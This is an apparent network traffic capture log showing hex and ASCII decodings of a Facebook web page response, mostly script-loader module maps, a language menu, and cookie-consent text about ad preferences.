34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 33 5a 7a 41 Data Ascii: "x2lrGAW","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7","RPLH8jg"],"be":1},"WebSpeedInteractionsTypedLogger":{"r":["pQ\/ifXu","8zbEZtu","hKY0QKT","BIylKC4"],"rds":{"m":["BanzaiScuba_DEPRECATED"]},"be":1},"AsyncRequest":{"r":["n6W4xMH","8zbEZtu","vGt2mxz","h3ZzA
2022-10-07 13:59:47 UTC	972	IN	Data Raw: 53 6e 6f 77 6c 69 66 74 22 3a 7b 22 72 22 3a 5b 22 62 4b 43 6c 54 67 56 22 2c 22 6c 47 30 6f 48 42 43 22 2c 22 62 39 4b 5a 49 48 4a 22 2c 22 71 31 6a 53 5a 38 63 22 2c 22 44 39 58 42 33 67 6a 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 59 74 55 33 43 35 75 22 2c 22 68 49 77 41 32 57 36 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 53 79 48 76 61 66 68 22 2c 22 47 44 70 76 74 4b 33 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 6a 31 76 63 68 56 64 22 2c 22 50 64 39 56 6a 78 6c 22 2c 22 43 51 57 57 67 50 76 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 34 33 66 32 4c 2b 36 22 2c 22 64 48 73 4a 51 36 79 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 52 58 55 68 43 Data Ascii: Snowlift":{"r":["bKClTgV","lG0oHBC","b9KZIHJ","q1jSZ8c","D9XB3gj","diogVau","YtU3C5u","hIwA2W6","dAxX0jj","mRpDwmd","e9ANzw\/","SyHvafh","GDpvtK3","CGkH4FY","j1vchVd","Pd9Vjxl","CQWWgPv","zK\/REUV","43f2L+6","dHsJQ6y","srPmdt4","D1\/JTmT","zPLgIGT","RXUhC
2022-10-07 13:59:47 UTC	973	IN	Data Raw: 6f 56 57 38 65 54 58 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 36 59 65 33 48 37 45 22 2c 22 59 30 65 38 68 30 41 22 2c 22 6b 53 39 54 42 76 4f 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6c 6c 34 5a 47 5c 2f 79 22 2c 22 4d 30 4c 31 44 6f 61 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 4f 4a 30 33 31 65 37 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 6a 6a 32 39 55 5a 42 22 2c 22 6e 41 47 52 49 34 69 22 2c 22 4c 38 59 63 49 6f 6e 22 2c 22 65 50 65 34 5a 52 36 22 2c 22 63 59 55 33 63 33 32 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 73 46 44 4a 68 68 77 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 68 63 36 4d 59 58 55 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 5c 2f 41 67 70 4f 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 Data Ascii: oVW8eTX","kOEHvpu","vGt2mxz","6Ye3H7E","Y0e8h0A","kS9TBvO","lWOvGTa","ll4ZG\/y","M0L1Doa","h3ZzAmG","OJ031e7","BIylKC4","jj29UZB","nAGRI4i","L8YcIon","ePe4ZR6","cYU3c32","Fn3rAl7","sFDJhhw","RPLH8jg","hc6MYXU","07JSiP0","dx\/AgpO"],"rds":{"m":["FbtLogging
2022-10-07 13:59:47 UTC	974	IN	Data Raw: 44 65 74 61 69 6c 73 44 69 61 6c 6f 67 41 73 79 6e 63 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 67 57 4d 4a 67 54 65 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 4f 66 66 65 72 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 68 49 65 6b 2b 62 47 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 65 72 66 58 53 68 61 72 65 64 46 69 65 6c 64 73 22 3a 7b 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4f 44 53 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4b 65 79 45 76 65 6e 74 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 47 6a 38 76 39 4c 34 22 2c 22 42 49 79 6c 4b 43 34 22 5d 2c 22 Data Ascii: DetailsDialogAsyncController":{"r":["gWMJgTe"],"be":1},"XOfferController":{"r":["hIek+bG"],"be":1},"PerfXSharedFields":{"r":["BIylKC4"],"be":1},"ODS":{"r":["8zbEZtu","hKY0QKT"],"be":1},"KeyEventTypedLogger":{"r":["8zbEZtu","hKY0QKT","Gj8v9L4","BIylKC4"],"
2022-10-07 13:59:47 UTC	976	IN	Data Raw: 51 4d 6d 34 47 43 6d 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 49 6e 6c 69 6e 65 54 61 62 4f 72 64 65 72 22 3a 7b 22 72 22 3a 5b 22 5a 35 4c 46 32 6a 31 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 75 74 74 6f 6e 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 59 74 55 33 43 35 75 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 6e 36 57 34 78 4d 48 Data Ascii: QMm4GCm"],"be":1},"ContextualLayerInlineTabOrder":{"r":["Z5LF2j1","zPLgIGT","QMm4GCm","8zbEZtu","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7"],"be":1},"XUIDialogButton.react":{"r":["YtU3C5u","dAxX0jj","zK\/REUV","srPmdt4","R5w1rCJ","IaR\/6uP","QMm4GCm","n6W4xMH
2022-10-07 13:59:47 UTC	977	IN	Data Raw: 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 5d 2c 20 66 75 6e 63 74 69 6f 6e 28 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 29 20 7b 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 2e 6c 6f 61 64 4f 6e 44 4f 4d 43 6f 6e 74 65 6e 74 52 65 61 64 79 28 5b 22 42 49 79 6c 4b 43 34 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 63 59 55 33 63 33 32 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 5c 2f 72 4f 30 6c 62 6e 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 49 61 52 5c 2f Data Ascii: <script>requireLazy(["InitialJSLoader"], function(InitialJSLoader) {InitialJSLoader.loadOnDOMContentReady(["BIylKC4","8zbEZtu","vGt2mxz","hKY0QKT","mRpDwmd","n6W4xMH","h3ZzAmG","dAxX0jj","cYU3c32","D1\/JTmT","Z2GjVu9","\/rO0lbn","lWOvGTa","diogVau","IaR\/
2022-10-07 13:59:47 UTC	979	IN	Data Raw: 38 34 36 62 0d 0a 71 75 69 72 65 73 5f 65 76 65 6e 74 22 3a 66 61 6c 73 65 2c 22 77 77 77 5f 73 61 66 65 5f 6a 73 5f 6d 6f 64 65 22 3a 22 68 6f 76 65 72 22 2c 22 6d 5f 73 61 66 65 5f 6a 73 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 67 68 6c 5f 70 61 72 61 6d 5f 6c 69 6e 6b 5f 73 68 69 6d 22 3a 66 61 6c 73 65 2c 22 63 6c 69 63 6b 5f 69 64 73 22 3a 5b 5d 2c 22 69 73 5f 6c 69 6e 6b 73 68 69 6d 5f 73 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 63 75 72 72 65 6e 74 5f 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 2c 22 62 6c 6f 63 6b 6c 69 73 74 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 5b 22 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 22 2c 22 61 64 73 2d 65 6e 63 72 79 70 74 69 6f 6e 2d 75 72 6c 2d 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 Data Ascii: 846bquires_event":false,"www_safe_js_mode":"hover","m_safe_js_mode":null,"ghl_param_link_shim":false,"click_ids":[],"is_linkshim_supported":true,"current_domain":"facebook.com","blocklisted_domains":["ad.doubleclick.net","ads-encryption-url-example.com"
2022-10-07 13:59:47 UTC	980	IN	Data Raw: 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 30 5f 47 5a 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 42 61 68 61 73 61 20 49 6e 64 6f 6e 65 73 69 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 64 61 5f 44 4b 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 72 73 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 61 6e 73 6b 22 2c 22 74 69 74 6c Data Ascii: {"__m":"__markup_3310c079_0_0_GZ"},"label":"Bahasa Indonesia","title":"","className":"headerItem"},{"class":"headerItem","value":"da_DK","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_1_rs"},"label":"Dansk","titl
2022-10-07 13:59:47 UTC	982	IN	Data Raw: 61 6c 75 65 22 3a 22 69 74 5f 49 54 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 44 74 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 75 5f 48 55 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d Data Ascii: alue":"it_IT","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_8_Dt"},"label":"Italiano","title":"","className":"headerItem"},{"class":"headerItem","value":"hu_HU","selected":false,"ctor":{"__m":"MenuSelectableItem
2022-10-07 13:59:47 UTC	983	IN	Data Raw: 6f 6d 5c 75 30 30 65 32 6e 5c 75 30 31 30 33 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 66 69 5f 46 49 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 32 53 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 53 75 6f 6d 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 Data Ascii: om\u00e2n\u0103","title":"","className":"headerItem"},{"class":"headerItem","value":"fi_FI","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_g_2S"},"label":"Suomi","title":"","className":"headerItem"},{"class":"hea
2022-10-07 13:59:47 UTC	985	IN	Data Raw: 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 65 5f 49 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 4f 4d 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 61 72 5f 41 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c Data Ascii: headerItem","value":"he_IL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_n_OM"},"label":"\u05e2\u05d1\u05e8\u05d9\u05ea","title":"","className":"headerItem"},{"class":"headerItem","value":"ar_AR","selected":fal
2022-10-07 13:59:47 UTC	986	IN	Data Raw: 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6a 61 5f 4a 50 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 36 39 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6b 6f 5f 4b 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c Data Ascii: "class":"headerItem","value":"ja_JP","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_u_69"},"label":"\u65e5\u672c\u8a9e","title":"","className":"headerItem"},{"class":"headerItem","value":"ko_KR","selected":false,
2022-10-07 13:59:47 UTC	987	IN	Data Raw: 65 31 34 36 64 63 5f 30 5f 30 5f 71 59 22 2c 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 6e 6a 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 75 74 6f 46 6c 69 70 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 43 6c 61 73 73 4f 6e 43 6f 6e 74 65 78 74 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 71 59 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 6e 6a 22 7d 2c 5b 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 75 74 6f 46 6c 69 70 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c Data Ascii: e146dc_0_0_qY","__elem_ec77afbd_0_0_nj","ContextualLayerAutoFlip","ContextualDialogArrow","ContextualLayerPositionClassOnContext"],[{"__m":"__elem_1de146dc_0_0_qY"},{"__m":"__elem_ec77afbd_0_0_nj"},[{"__m":"ContextualLayerAutoFlip"},{"__m":"ContextualDial
2022-10-07 13:59:47 UTC	989	IN	Data Raw: 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 37 65 37 61 34 34 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 34 5c 22 3e 50 72 6f 76 69 64 65 20 61 20 73 61 66 65 72 20 65 78 70 65 72 69 65 6e 63 65 20 62 79 20 75 73 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 65 20 72 65 63 65 69 76 65 20 66 72 6f 6d 20 63 6f 6f 6b 69 65 73 20 6f 6e 20 61 6e 64 20 6f 66 66 20 46 61 63 65 62 6f 6f 6b 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 Data Ascii: v>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"img sp_2myvABqqKqq sx_7e7a44\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide a safer experience by using information we receive from cookies on and off Facebook\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo2\">\u0
2022-10-07 13:59:47 UTC	990	IN	Data Raw: 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 33 51 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 73 20 69 6e 20 Data Ascii: n control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_3Q\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controls in
2022-10-07 13:59:47 UTC	992	IN	Data Raw: 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 6c 65 61 72 6e 20 77 68 79 20 79 6f 75 26 23 30 33 39 3b 72 65 20 73 65 65 69 6e 67 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 61 64 20 61 6e 64 20 63 6f 6e 74 72 6f 6c 20 68 6f 77 20 77 65 20 75 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 77 65 20 63 6f 6c 6c 65 63 74 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 4f 66 66 2d 46 Data Ascii: 03Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad preferences to learn why you're seeing a particular ad and control how we use information that we collect to show you ads.\u003C\/p>\u003Cp class=\"_9si-\">Off-F
2022-10-07 13:59:47 UTC	993	IN	Data Raw: 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 30 63 39 54 61 6b 52 48 53 58 4f 6a 54 7a 7a 37 79 38 45 4c 73 30 4d 46 75 36 6e 62 77 6e 49 55 72 49 77 61 4c 6c 36 36 4c 41 48 53 6d 74 39 45 52 49 78 4a 51 38 73 70 42 70 41 57 4d 57 64 33 59 78 58 52 64 6c 73 66 4a 53 4d 6f 73 73 70 41 45 33 Data Ascii: om Facebook and other participating companies through the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&h=AT0c9TakRHSXOjTzz7y8ELs0MFu6nbwnIUrIwaLl66LAHSmt9ERIxJQ8spBpAWMWd3YxXRdlsfJSMosspAE3
2022-10-07 13:59:47 UTC	995	IN	Data Raw: 61 6e 69 65 73 20 77 65 20 77 6f 72 6b 20 77 69 74 68 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 69 72 20 73 65 72 76 69 63 65 73 2e 20 54 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 68 6f 77 20 61 64 76 65 72 74 69 73 65 72 73 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 74 68 65 20 63 68 6f 69 63 65 73 20 74 68 65 79 20 6f 66 66 65 72 2c 20 79 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 72 65 73 6f 75 72 63 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 Data Ascii: anies we work with generally use cookies and similar technologies as part of their services. To learn more about how advertisers generally use cookies and the choices they offer, you can review the following resources:\u003C\/p>\u003Cul class=\"_9o-q\">\u
2022-10-07 13:59:47 UTC	996	IN	Data Raw: 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 62 5f 78 5c 2f 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 Data Ascii: 3Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_b_x\/\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controlling cookies with browser settings\u003C\/div>\u003C\/sp
2022-10-07 13:59:47 UTC	998	IN	Data Raw: 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 69 65 5c 75 30 30 32 35 32 46 68 65 6c 70 5c 75 30 30 32 35 32 46 31 37 34 34 32 5c 75 30 30 32 35 32 46 77 69 6e 64 6f 77 73 2d 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2d 64 65 6c 65 74 65 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 26 61 6d 70 3b 68 3d 41 54 33 68 32 43 4a 37 6b 4f 54 5f 44 74 54 35 36 4d 32 49 42 76 70 43 33 38 77 56 62 63 35 48 6a 6e 4c 70 2d 48 6e 75 30 43 79 42 34 49 74 62 4b 43 4c 77 7a 34 72 72 47 53 4f 4d 38 4c 7a 45 4b 56 52 6f 45 52 5f 59 35 43 50 6e 51 68 77 77 5a 64 34 37 52 57 69 4b 4c 75 63 6e 63 75 5f 47 58 61 4f 49 51 Data Ascii: 